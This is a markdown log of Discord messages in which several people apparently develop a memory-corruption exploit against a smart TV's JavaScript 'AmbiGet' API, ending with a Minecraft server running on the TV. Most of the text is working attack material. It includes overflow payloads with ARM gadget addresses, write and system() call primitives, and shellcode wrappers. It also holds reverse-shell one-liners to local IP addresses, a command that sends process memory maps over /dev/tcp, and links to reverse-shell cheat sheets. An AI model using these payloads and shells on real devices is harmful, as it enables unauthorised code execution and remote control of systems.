# Discord messages of interest Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time. > ok so I found some stuff :^) > ```// write primitive 4bytes > // looks relatively safe to call (crashes with a 1 deref in strstr) > PC = 0x23BCC > R4 = address+0x880 > R11 = data > > // system call (SP buffer) > PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer) > R4 = R11 = unused > > // system call (R4 buffer) > // looks super safe > PC = 0x11D48 or 0x14108 > R4 = address of ascii string for system() > R11 = unused > > // system call (R4 buffer) but probably unsafe > PC = 0x2F3DC (super unsafe) or 0x2F52C > R4 = address of ascii string for system() > R11 = unused > ``` > these are the useful gadgets > there seems to be a memory area that stays static between runs, and is in a good address range > thus it might be possible to use the write primitive to write a buffer for system there > @Jan4V#0289 > You will still have to catch me up with what I should do though xd > @Emily | Sunpy#5213 > can you send me the js you have for the AmbiGet? > I wanna make a nicer setup for this and we can try > @Jan4V#0289 > ```js > new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + > " >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01) > ) > ``` > @Emily | Sunpy#5213 > File: `exploit.js` (1.72 KB) > this is the general idea > but I wouldn't run this whole thing at first > if/when you wanna mess with this mention me and I'll jump into voice > @Jan4V#0289 > ``/dev/shm/shm_tmp/fusion.0.1`` > @Jan4V#0289 > File: `crashdump` (6.03 MB) > @Emily | Sunpy#5213 > File: `crashdump` (181.60 KB) > @Emily | Sunpy#5213 > ```js > function executeShellcode(shellcode) { > var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; > payload += encodeInt(0x41414141); > payload += encodeInt(0x42424242); > payload += encodeInt(0x9EBA0404); > for(let i = 0; i < 4194304; i++) > { > payload += encodeInt(0xE0A15005); > } > payload += shellcode; > new TV_JSP().tvServices.AmbiGet(0, payload); > } > ``` > @Jan4V#0289 > http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/ > @Emily | Sunpy#5213 > http://shell-storm.org/shellcode/files/shellcode-730.php > @Jan4V#0289 > btw `"a".repeat(123)` is a thing > @HoLLy#2750 > ```js > function executeShellcode(shellcode) { > var payload = "A".repeat(1036); > payload += encodeInt(0x41414141); > payload += encodeInt(0x42424242); > payload += encodeInt(0x9EBA0404); > for(let i = 0; i < 0x400000; i++) > { > payload += encodeInt(0xE0A15005); > } > payload += shellcode; > new TV_JSP().tvServices.AmbiGet(0, payload); > } > > executeShellcode(encodeInt(0xEF91337B)); > ``` > @Jan4V#0289 > File: `crashdump` (124.31 KB) > @Emily | Sunpy#5213 > > ```js > function encodeInt(input) { > return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF)); > } > function executeCommand(command) { > var payload = "A"*1036; > payload += encodeInt(0x01011D48); > payload += encodeInt(0x42424242); > payload += encodeInt(0x9EBA0404); > for(let i = 0; i < 0x400000; i++) > { > payload += encodeInt(0xE0A15005); > } > payload += encodeInt(0xE2444401); > payload += encodeInt(0xE1A0B004); > payload += encodeInt(0xE28F4008); > payload += encodeInt(0xE1A0F00B); > payload += encodeInt(0x41414141); > payload += encodeInt(0x42424242); > payload += command; > new TV_JSP().tvServices.AmbiGet(0, payload); > } > > executeCommand("touch /tmp/jan4v.txt"); > ``` > @Jan4V#0289 > File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp) > @Emily | Sunpy#5213 > ``/dev/shm/shm_tmp/fusion.0.1`` > @Jan4V#0289 > File: `crashdump` (6.03 MB) > @Emily | Sunpy#5213 > File: `crashdump` (167.34 KB) > @Emily | Sunpy#5213 > ```js > function encodeInt(input) { > return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF)); > } > > function execute(pc, r4, r11) { > var payload = "A".repeat(1040); > payload += encodeInt(r4); > payload += encodeInt(r11); > payload += encodeInt(pc); > new TV_JSP().tvServices.AmbiGet(0, payload); > } > > function writeMemory4(address, data) > { > execute(0x23BCC, address + 0x880, data); > } > > function callSystem(address) > { > execute(0x11D48, address, 0x41414141); > } > > writeMemory4(0x8a55f040, 0x7478742E); > ``` > @Jan4V#0289 > I mean you could already pwn the browser > I believe > so you could make it display any web page > and we can read/write a bunch of files on the fs > but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^) > @HoLLy#2750 > We couldn't overwrite the scripts though > @Shaddy#4422 > when I say "we" I basically mean an > we tried like 1 script lol > @HoLLy#2750 > we dont have permissions to write to the file > we only have permissions to tmp > @Emily | Sunpy#5213 > there's multiple places that get executed > probably more places too though > @HoLLy#2750 > We've tried multiple places > @Shaddy#4422 > if there's a file/folder with incorrect permissions > @HoLLy#2750 > That's the less exciting exploit anyway :^) > @Shaddy#4422 > I tried to look for a script that *may* be in tmp that gets executed as the people doesnt seem to be consistent > but couldnt find any > we have permissions to /3rd_rw aswell > @Emily | Sunpy#5213 > im going to jump out the window > we can write commands to an ini file in read/write area > @Emily | Sunpy#5213 > ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`` > @Jan4V#0289 > @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &` > @HoLLy#2750 > https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ > http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet > @HoLLy#2750 > `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &` > @Emily | Sunpy#5213 > ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &`` > @Jan4V#0289 > File: `crashdump` (268.85 KB) > @Emily | Sunpy#5213 > ![Terminal-tmux](img/img0.png "img0") > @HoLLy#2750 > ```js > function encodeInt(input) { > return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF)); > } > > function execute(pc, r4, r11) { > var payload = "A".repeat(1040); > payload += encodeInt(r4); > payload += encodeInt(r11); > payload += encodeInt(pc); > new TV_JSP().tvServices.AmbiGet(0, payload); > } > > function callSystem(address) > { > execute(0x11D48, address, 0x41414141); > } > > callSystem(0x9CF55588); > ``` > @Jan4V#0289 > ![cmd - nc -nlvp 1337](img/img1.png "img1") > @Emily | Sunpy#5213 > ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l`` > ![openbox commands](img/img2.png "img2") > @Jan4V#0289 > ``mount -t devpts none /dev/pts`` > @Jan4V#0289 > ![terminal](img/img3.png "img3") > @Emily | Sunpy#5213 > https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz > @Jan4V#0289 > https://betacraft.pl/server-archive/minecraft/ > @Jan4V#0289 > https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz > @Jan4V#0289 > ``LD_LIBRARY_PATH=/lib:/3rd_rw/server`` > https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz > @Jan4V#0289 > ![minecraft server start](img/img4.png "img4") > ![minecraft server still starting](img/img5.png "img5") > @Emily | Sunpy#5213 > 569043771063ns loadtime :D > @Emily | Sunpy#5213 > ![minecraft server running](img/img6.png "img6") > @Emily | Sunpy#5213 > ``` > AllowTcpForwarding remote > AllowStreamLocalForwarding no > GatewayPorts yes > ``` > @Jan4V#0289 > > minecraft code execution > > \- Holly > @Emily | Sunpy#5213